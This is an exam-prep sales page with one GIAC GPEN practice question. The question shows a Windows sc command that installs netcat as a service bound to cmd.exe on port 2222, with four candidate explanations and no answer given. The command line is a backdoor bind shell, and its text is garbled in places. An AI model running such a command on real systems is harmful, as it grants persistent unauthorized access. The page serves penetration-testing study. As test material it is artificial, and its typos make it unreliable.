While reviewing traffic from a tcpdump capture, you notice the following commands being sent from...

GIAC GPEN Question Answer

While reviewing traffic from a tcpdump capture, you notice the following commands being sent from a remote system to one of your web servers:

C:\>sc winternet.host.com create ncservicebinpath- "c:\tools\ncexe -I -p 2222 -e cmd.exe"

C:\>sc vJnternet.host.com query ncservice.

What is the intent of the commands?

The first command creates a backdoor shell as a service. It is being started on TCP2222 using cmd.exe. The second command verifies the service is created and itsstatus.

The first command creates a backdoor shell as a service. It is being started on UDP2222 using cmd.exe. The second command verifies the service is created and itsstatus.

This creates a service called ncservice which is linked to the cmd.exe command andits designed to stop any instance of nc.exe being run. The second command verifiesthe service is created and its status.

The first command verifies the service is created and its status. The secondcommand creates a backdoor shell as a service. It is being started on TCP 2222connected to cmd.exe.

GIAC GPEN View All Questions

GIAC GPEN Summary

Vendor: GIAC
Product: GPEN
Update on: Jul 25, 2025
Questions: 385

Price: $52.5 ~~$149.99~~

A penetration tester obtains telnet access to a target machine using a captured credential.

Analyze the command output below.

Weekend Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: xmasmnth

While reviewing traffic from a tcpdump capture, you notice the following commands being sent from...

The Answer Is:

GIAC GPEN Summary

Payments We Accept

Contact Us